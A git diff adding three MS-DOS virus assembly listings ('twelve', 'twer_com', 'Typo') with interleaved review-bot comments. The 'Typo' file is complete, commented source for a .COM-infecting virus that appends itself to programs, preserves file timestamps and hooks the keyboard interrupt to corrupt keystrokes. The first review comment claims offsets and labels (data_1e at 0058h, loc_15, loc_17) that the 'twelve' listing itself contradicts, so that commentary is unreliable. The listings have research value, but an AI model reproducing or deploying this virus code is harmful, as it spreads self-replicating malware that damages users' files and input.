a/MSDOS/Virus.MSDOS.Unknown.twelve.asm b/MSDOS/Virus.MSDOS.Unknown.twelve.asm new file mode 100644 index 00000000..daa1a719 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.twelve.asm 
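Review bot: The comment at loc_1 ("read and change some interrupts - replacing one with other") leaves out the one fact an analyst needs: data_1e/data_2e are 0000:0058h/005Ah, the INT 16h (BIOS keyboard) vector, which is pointed at cs:0102h (the listing's offsets presume a 100h origin) where the bytes `0B0h,67h,3Ch,67h,0CFh` decode to `mov al,67h / cmp al,67h / iret`, and the following `or al,2 / out 21h,al` masks IRQ1 on the 8259, so the keyboard is dead until loc_17 undoes both. I would replace that comment with `; INT 16h (0000:0058h) -> stub at cs:0102h (returns AL=67h); IRQ1 masked on the 8259 until loc_17`. The infection marker is also undocumented: loc_5 tests the DTA time word at data_8e with `and ax,1Fh / cmp al,1Fh` and the AH=57h call sets it with `or cl,1Fh`, i.e. a seconds field of 31 (a 62-second timestamp) marks infected .COM files, and `cmp byte ptr ds:data_13e,3` caps each run at three files before loc_15 runs the day-8 date check that the existing comment describes.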
@@ -0,0 +1,302 @@ +PAGE 59,132 + +; +; +; TWELVE +; +; Created: 26-Apr-90 +; Version: +; Passes: 5 Analysis Options on: H +; +; +; + +data_1e equ 3366h ; (7415:3366=0) +data_2e equ 7EF7h ; (7415:7EF7=0) +data_3e equ 8C8Dh ; (7415:8C8D=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +twelve proc far + +start: +;* jmp $+4h ;* + db 0E9h, 1, 0 + db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh + db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh + db 0B9h, 71h, 5, 31h, 0Dh, 2Bh + db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh + db 0D8h, 90h, 33h, 0D1h, 31h, 5 + db 46h, 43h, 0F8h, 40h, 90h, 47h + db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh + db 6Eh, 3, 0C9h, 82h, 6Fh, 36h + db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh + db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh + db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h + db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h + db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h + db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h + db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h + db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h + db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0 + db 51h, 7Ch, 7, 47h, 0DDh, 22h + db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h + db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h + db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h + db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h + db 3, 0F4h, 7Eh, 21h, 74h, 31h + db 0Ch, 0EFh, 59h, 9, 0D9h, 37h + db 12h, 44h, 92h, 18h, 30h, 12h + db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh + db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h + db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h + db 59h, 5Dh, 98h, 2, 0Fh, 29h + db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h + db 3, 52h, 13h, 76h, 0D5h, 58h + db 13h, 4, 0D7h, 63h, 39h, 74h + db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah + db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h + db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh + db 0BBh, 14h, 0EBh, 67h, 14h, 50h + db 34h, 93h, 41h, 0D3h, 0D6h, 87h + db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h + db 16h, 7, 39h, 49h, 0F5h, 0F3h + db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h + db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh + db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch + db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h + db 0FDh, 0Ch, 59h, 78h, 6, 43h + db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h + db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh + 
db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch + db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h + db 39h, 78h, 79h, 8, 0FDh, 0D7h + db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh + db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h + db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh + db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h + db 74h, 31h, 0Ah, 0F3h, 51h, 55h + db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh + db 0EDh, 0ACh, 66h, 45h, 14h, 55h + db 34h, 93h, 50h, 0BEh, 14h, 0DDh + db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh + db 13h, 0Ch, 7Eh, 21h, 74h, 31h + db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h + db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h + db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h + db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh + db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h + db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh + db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh + db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h + db 41h, 31h, 0, 0D8h, 0E7h, 0D8h + db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h + db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h + db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h + db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh + db 0C0h, 0D2h, 11h, 55h, 4, 1Fh + db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah + db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah + db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah + db 0F1h, 3Fh, 89h, 0, 13h, 5Fh + db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h + db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh + db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h + db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h + db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh + db 21h, 34h, 17h, 28h, 0D5h, 1Fh + db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh + db 90h, 95h, 5, 23h, 6Ah, 0FDh + db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh + db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh + db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh + db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh + db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh + db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh + db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh + db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h + db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh + db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh + db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h + db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh + db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch + db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh + db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h + db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h + db 0F5h, 4, 51h, 78h, 
0BBh, 11h + db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh + db 1, 6Eh, 4, 65h, 0D6h, 0ECh + db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h + db 3Dh, 61h, 0D5h, 38h, 0, 23h + db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh + db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h + db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh + db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh + db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h + db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h + db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh + db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h + db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h + db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h + db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh + db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch + db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9 + db 66h, 0A1h, 15h, 12h, 74h, 77h + db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh + db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h + db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h + db 0B3h, 9, 76h, 25h, 74h, 35h + db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h + db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh + db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h + db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h + db 3, 78h, 18h, 40h, 0FDh, 0F2h + db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h + db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h + db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh + db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh + db 5, 76h, 14h, 0F4h, 0FDh, 0AEh + db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h + db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh + db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah + db 0DEh, 7, 5Eh, 12h +loc_1: + cmp al,0Fh + mov bp,7E24h + aas ; Ascii adjust + lodsw ; String [si] to ax + mov bl,2Ah ; '*' + cld ; Clear direction + mov bx,7E1Fh + pop es + push es + push di + db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h + db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h + db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch + db 0BEh, 78h, 29h, 0A7h, 0A3h + db 78h + +locloop_2: + mov bh,ch + add dh,ds:data_2e[si] ; (7415:7EF7=0) + adc word ptr [bx],41h + esc 7,cl ; coprocessor escape + pop cx + xchg ax,dx + rcr cl,1 ; Rotate thru carry + rcl byte ptr [di-68h],cl ; Rotate thru carry + esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape + sbb al,ds:data_1e[bx+si] ; (7415:3366=0) +loc_3: + mov bp,7EA5h + adc word ptr [bx+di],0CD5Fh + sti ; 
Enable interrupts + ja loc_1 ; Jump if above + db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h + db 0B3h + db 4Bh, 4Dh +loc_5: + esc 3,[bp+si+4E0Eh] ; coprocessor escape + movsb ; Mov [si] to es:[di] + push ds + adc [bp+0Bh],al + popf ; Pop flags + push si + add al,dl + db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h + db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h + db 56h, 0F7h, 0EDh +loc_6: + loopz locloop_2 ; Loop if zf=1, cx>0 + +;* jo loc_4 ;*Jump if overflow=1 + db 70h, 0D3h + xlat [bx] ; al=[al+[bx]] table + jbe loc_5 ; Jump if below or = + esc 5,[si] ; coprocessor escape + test cx,sp + dec ax + adc al,49h ; 'I' + int 0BDh + push di + in ax,dx ; port 0, DMA-1 bas&add ch 0 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + call $-4A7Fh + sbb ax,5E05h + push bp + jl loc_3 ; Jump if < + das ; Decimal adjust + dec si +;* jmp short loc_7 ;*(04BD) + db 0EBh, 0EDh + db 18h, 0D3h, 49h, 36h, 95h, 9Dh + db 14h, 0DBh, 71h, 36h, 99h, 95h + db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah + db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h + db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h + db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h + db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh + db 0Eh, 0FEh + db 9 +loc_8: + jge loc_6 ; Jump if > or = + stosb ; Store al to es:[di] + mov al,0B3h + mov ch,0Dh + mov ax,1D6Dh + sbb dh,al + cmc ; Complement carry + hlt ; Halt processor + div al ; al, ah rem = ax/reg + jmp short loc_8 ; (04FD) + db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h + db 11h, 1Eh, 10h, 11h, 1Bh, 15h + db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h + db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh + db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h + db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h + db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h + db 9Bh, 3Fh, 5Eh, 95h, 7, 64h + db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh + db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh + db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh + db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h + db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h + db 13h, 6Eh, 2, 45h, 0F6h, 1Fh + db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h + db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh + db 15h, 10h, 61h, 0D7h, 18h, 3Ah + db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h + 
db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh
+ db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h
+ db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh
+ db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h
+ db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h
+ db 14h, 16h, 14h, 12h, 0ECh, 0EFh
+ db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h
+ db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h
+ db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h
+ db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh
+ db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h
+ db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h
+ db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh
+ db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh
+ db 0E3h, 93h, 95h, 97h, 29h, 5Fh
+ db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh
+ db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h
+ db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h
+ db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h
+ db 0EDh, 0EFh, 0EDh
+
+twelve endp
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.twer_com.asm b/MSDOS/Virus.MSDOS.Unknown.twer_com.asm
new file mode 100644
index 00000000..e8d9097a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.twer_com.asm
@@ -0,0 +1,59 @@
+SEG_A segment byte public
+ assume cs:seg_a,ds:seg_a
+ org 100h
+
+MULTIPLEXOR proc far
+start:
+ jmp BEGIN
+MULTIPLEXOR endp
+
+; Subroutine work on the DOS Int2Fh (Multiplexor)
+; It stay rezident and calling Old Int2Fh, if don't call FnBAh.
+; Functions (ah=BAh): Return:
+;
+; al=0 al=0ffh, bl=READ_ON
+; al=1 bl=READ_ON=1
+; al=2 bl=READ_ON=0
+; al=3 Calling WRITE; bl=READ_ON=1
+
+ADM proc
+ cmp ah,byte ptr cs:ADM_INT
+ je ADM_WORK
+ db 0eah
+INT2F_JUMP db 0,0,0b2h,89h
+ADM_WORK:
+ cmp al,0
+ jne ADM_WORK1
+ mov al,0ffh
+ IRET
+ADM_WORK1:
+ push dx
+ push ax
+ mov dl,al
+ mov ah,2
+ int 21h
+ pop ax
+ pop dx
+ IRET
+ADM endp
+
+ADM_INT db 93h
+
+REZIDENT:
+BEGIN:
+ ; Init interrupt vectors
+ mov ax,352fh
+ int 21h
+ mov word ptr cs:INT2F_JUMP,bx
+ mov word ptr cs:INT2F_JUMP+2,es
+ mov al,2fh
+ mov dx,offset ADM
+ mov ah,25h
+ int 21h
+ mov ah,093h
+ mov al,'*'
+ int 2fh
+ mov dx,offset REZIDENT
+ int 27h
+SEG_A ends
+ end start
\ No newline at end of file
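Review bot: The listing gives no hint that the instructions decoded from `loc_1` onward are not meaningful code, so a reader may take `int 0BDh`, `hlt` and the `esc` coprocessor escapes as intentional; the entry at `start` is a 3-byte `jmp` (`db 0E9h, 1, 0`) straight into the byte run, and everything after it reads like a disassembler resynchronising on encrypted or garbage data. Add a note under the Sourcer banner, e.g. `; NOTE: body from start onward appears encrypted; mnemonics after loc_1 are a mis-synchronised disassembly, not intent`. Without that, the only recoverable fact here is the initial jump, and the file should be treated as a byte image rather than readable source.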
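Review bot: The header comment documents a function `ah=BAh` with sub-functions `al=0..3` (READ_ON, WRITE), but the handler `ADM` compares `ah` against `ADM_INT` (`93h`) and only distinguishes `al=0` (returns `al=0ffh`) from anything else (prints `al` through DOS function 02h); the install code confirms this by calling `int 2fh` with `ah=093h` and `al='*'`. Replace the block with what the code does, e.g. `; Int 2Fh hook: ah=93h,al=0 -> al=0FFh (presence check); ah=93h,al<>0 -> write al via DOS fn 02h; any other ah -> far jump to saved Int 2Fh`. It is also worth stating that `INT2F_JUMP db 0,0,0b2h,89h` is only a placeholder patched at `BEGIN` from the `352Fh` result, and that `ADM_WORK1` issues `int 21h` from inside an Int 2Fh handler, which presumably relies on the caller not already being inside DOS — a one-line caveat there would save the next reader a check.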
diff --git a/MSDOS/Virus.MSDOS.Unknown.typo.asm b/MSDOS/Virus.MSDOS.Unknown.typo.asm
new file mode 100644
index 00000000..85e4ea60
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.typo.asm
@@ -0,0 +1,433 @@ + page 65,132 + title The 'Typo' Virus +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Typo' Virus +; Disassembled by Joe Hirst, October 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +VECTOR SEGMENT AT 0 + + ; Interrupt vectors + + ORG 58H +BW0058 DW ? ; Interrupt 16H offset +BW005A DW ? ; Interrupt 16H segment + ORG 80H +BW0080 DW ? ; Interrupt 20H offset +BW0082 DW ? ; Interrupt 20H segment +BW0084 DW ? ; Interrupt 21H offset +BW0086 DW ? ; Interrupt 21H segment + +VECTOR ENDS + +RAM SEGMENT AT 400H + + ; System data + + ORG 6CH +BW046C DW ? ; System clock + +RAM ENDS + +HOST SEGMENT AT 0 + + ORG 2CH +DW002C DW ? + ORG 0D0H +DW00D0 EQU THIS WORD +DB00D0 DB ? + ORG 100H +DB0100 DB ? +DW0101 DW ? + +HOST ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + + ASSUME CS:CODE,DS:HOST + + DB 'V1' ; Signature + DB 0E9H, 1, 0 ; Jump for start of host + DB '*.COM', 0 ; File spec for infection + DB 0CEH, 0CDH, 20H ; File start read buffer + DB 'V1' ; Signature test read buffer + DW 5 ; File handle + DB 0CDH, 20H, 90H ; Start of host + DB 0 + DW 5AH ; Generation count + DB 0 + + ; Entry point + +START: PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH CS + POP DS + CALL BP0024 ; \ Get current address +BP0024: POP SI ; / + SUB SI,24H ; Relocate from start of virus + DEC WORD PTR [SI+16H] ; Subtract from generation count + CMP WORD PTR [SI+16H],3 ; Is generation count three? 
+ JNE BP0036 ; Branch if not + MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91 +BP0036: CALL BP02BE ; Test system for infection + MOV DX,00D0H ; Temp default DTA + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + MOV AL,[SI+0BH] ; \ Save start of host (1) + MOV [SI+12H],AL ; / + MOV AX,[SI+0CH] ; \ Save start of host (2) + MOV [SI+13H],AX ; / + MOV AH,2AH ; Get date function + INT 21H ; DOS service + TEST DL,1 ; First of month? + JNZ BP0074 ; Branch if not + MOV DX,SI ; \ Address '*.COM' + ADD DX,5 ; / + nop + XOR CX,CX ; No attributes + MOV AH,4EH ; Find first file function + INT 21H ; DOS service + JB BP0074 ; Branch if not found +BP0063: CALL BP0092 ; Test for infection + MOV DX,SI ; \ Address '*.COM' + ADD DX,5 ; / + nop + XOR CX,CX ; No attributes + MOV AH,4FH ; Find next file function + INT 21H ; DOS service + JNB BP0063 ; Branch if found +BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1) + MOV DB0100,AL ; / + MOV AX,[SI+13H] ; \ Restore start of host (2) + MOV DW0101,AX ; / + MOV DX,0080H ; Original default DTA + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + MOV AX,0100H ; \ Branch to start of host + JMP AX ; / + + ; Test for infection in COM file + +BP0092: MOV AX,4301H ; Set file attributes function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + XOR CX,CX ; No attributes + INT 21H ; DOS service + MOV AX,3D02H ; Open handle (R/W) function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + INT 21H ; DOS service + JNB BP00A9 ; Branch if no error + JMP BP015D ; Return + +BP00A9: MOV [SI+10H],AX ; Save file handle + MOV BX,AX ; Move file handle + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + MOV DX,SI ; \ Address start-of-host store + ADD DX,000BH ; / + nop + INT 21H ; DOS service + CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump? 
+ JNE BP00F1 ; Branch if not + MOV DX,[SI+0CH] ; \ + SUB DX,16H ; / + XOR CX,CX ; No high offset + MOV AX,4200H ; Move file pointer function + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + MOV BX,AX ; Move actual offset (? not used) + MOV AH,3FH ; Read handle function + MOV CX,2 ; Length to read + MOV DX,SI ; \ Address signature test buffer + ADD DX,000EH ; / + nop + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + CMP AX,0 ; Did we read anything? + JE BP00F1 ; Branch if not + MOV AX,[SI+0EH] ; Get signature test + CMP AX,[SI] ; Is it signature? + JE BP014A ; Branch if yes +BP00F1: XOR CX,CX ; \ No offset + XOR DX,DX ; / + MOV AX,4202H ; Move file pointer function (EOF) + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + SUB AX,3 ; Convert length to jump offset + MOV [SI+3],AX ; Store in jump + MOV BX,[SI+10H] ; Get file handle + MOV AH,40H ; Write handle function + MOV CX,OFFSET ENDADR ; Length of virus + NOP + MOV DX,SI ; \ Address start of virus + ADD DX,0 ; / + nop + INT 21H ; DOS service + JB BP014A ; Branch if error + ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset + XOR DX,DX ; \ No offset + XOR CX,CX ; / + MOV AX,4200H ; Move file pointer function + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + MOV BX,[SI+10H] ; Get file handle + MOV AH,40H ; Write handle function + MOV CX,3 ; Length of jump + MOV DX,SI ; \ Address initial jump + ADD DX,2 ; / + nop + INT 21H ; DOS service + MOV AX,5701H ; Set file date & time function + MOV BX,[SI+10H] ; Get file handle + MOV CX,DW00D0+16H ; Get file time from DTA + MOV DX,DW00D0+18H ; Get file date from DTA + INT 21H ; DOS service +BP014A: MOV BX,[SI+10H] ; Get file handle + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV AX,4301H ; Set file attributes function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + MOV CL,DB00D0+15H ; Get attributes 
from DTA + INT 21H ; DOS service +BP015D: RET + + ; Interrupt 16H routine + +BP015E: STI + CMP AH,0DDH ; Infection test function? + JNE BP0167 ; Branch if not + MOV AL,AH ; Copy function number + IRET + +BP0167: CMP AH,0 ; Get key token? + JE BP01D8 ; Branch if yes + DB 0EAH ; Far jump +DW016D DW 0488H ; Int 16H offset +DW016F DW 39D8H ; Int 16H segment + +DW0171 DW 0FA76H +DW0173 DW 0F9DCH +DW0175 DW 005AH + +DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H + DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H + DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H + DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H + DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH + DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH + DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H + DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H + DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H + DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H + DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H + DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH + DB 02EH + +BP01D8: PUSH SI + CALL BP01DC ; \ Get current address +BP01DC: POP SI ; / + PUSHF + CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call + PUSH BX + PUSH ES + MOV BX,0040H ; \ Address system RAM + MOV ES,BX ; / + ASSUME ES:RAM + MOV BX,BW046C ; Get system clock, low word + PUSH BX + SUB BX,CS:[SI-6BH] ; DW0171 + CMP BX,2 + POP BX + MOV CS:[SI-6BH],BX + JG BP0236 + XCHG BX,CS:[SI-69H] ; DW0173 + SUB BX,CS:[SI-69H] + NEG BX + CMP BX,CS:[SI-67H] ; DW0175 + JL BP0236 + DEC WORD PTR CS:[SI-67H] + CMP WORD PTR CS:[SI-67H],6 + JE BP021E + MOV WORD PTR CS:[SI-67H],005BH +BP021E: SUB SI,65H + PUSH CX + MOV CX,0061H +BP0225: CMP AL,CS:[SI] + JE BP0231 + INC SI + LOOP BP0225 + POP CX + JMP BP0236 + +BP0231: POP CX + MOV AL,CS:[SI+1] +BP0236: POP ES + POP BX + POP SI + RETF 2 + + ; Interrupt 21H routine + + ASSUME ES:NOTHING +BP023C: CMP AH,0 ; Terminate program? + JE BP0246 ; Branch if yes + CMP AH,4CH ; Load? 
+ JNE BP025F ; Branch if not +BP0246: CALL BP026D ; Install virus in memory + MOV DX,CS:DW002C ; \ Set ES to environment block + MOV ES,DX ; / + MOV BX,0 ; Zero length + MOV AH,4AH ; Set block function + INT 21H ; DOS service + MOV DX,001DH ; \ Length to keep + ADD DX,1 ; / + MOV AH,31H ; Keep process function +BP025F: DB 0EAH ; Far jump +DW0260 DW 2DEAH ; Int 21H offset +DW0262 DW 4242H ; Int 21H segment + + ; Interrupt 20H routine + +BP0264: MOV AX,4C00H ; Fake a load + JMP BP023C ; Process as a DOS service + +DW0269 DW 2C08H ; Int 20H offset +DW026B DW 4242H ; Int 20H segment + + ; Install virus in memory + +BP026D: PUSH CX + PUSH DI + PUSH SI + PUSH ES + CALL BP0274 ; \ Get current address +BP0274: POP SI ; / + PUSH SI + MOV DI,0100H ; Address start of area + MOV CX,OFFSET BP023C-BP015E ; Length to copy +BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte + MOV CS:[DI],AL ; Store in new location + INC SI ; Next input position + INC DI ; Next output position + LOOP BP027C ; Repeat to end of area + POP SI + XOR CX,CX ; \ Address zero + MOV ES,CX ; / + ASSUME ES:VECTOR + MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset + MOV BW0084,CX ; / + MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment + MOV BW0086,CX ; / + MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset + MOV BW0080,CX ; / + MOV CX,CS:[SI-9] ; \ Restore Int 20H segment + MOV BW0082,CX ; / + MOV CX,0100H ; \ Install moved area as Int 16H + MOV BW0058,CX ; / + ASSUME ES:NOTHING + POP ES + POP SI + POP DI + POP CX + RET + + ; Test system for infection + +BP02BE: PUSH AX + XOR AL,AL ; Clear register + MOV AH,0DDH ; Infection test function + INT 16H ; Keyboard I/O + CMP AL,AH ; Are they the same + JNE BP02CB ; Branch if not + POP AX + RET + + ; Install interrupts + +BP02CB: PUSH BX + PUSH SI + PUSH ES + MOV DX,[SI+16H] ; Get generation count + CALL BP02D4 ; \ Get current address +BP02D4: POP SI ; / + PUSH BX + PUSH ES + MOV BX,0040H ; \ Address system RAM + MOV ES,BX ; / + 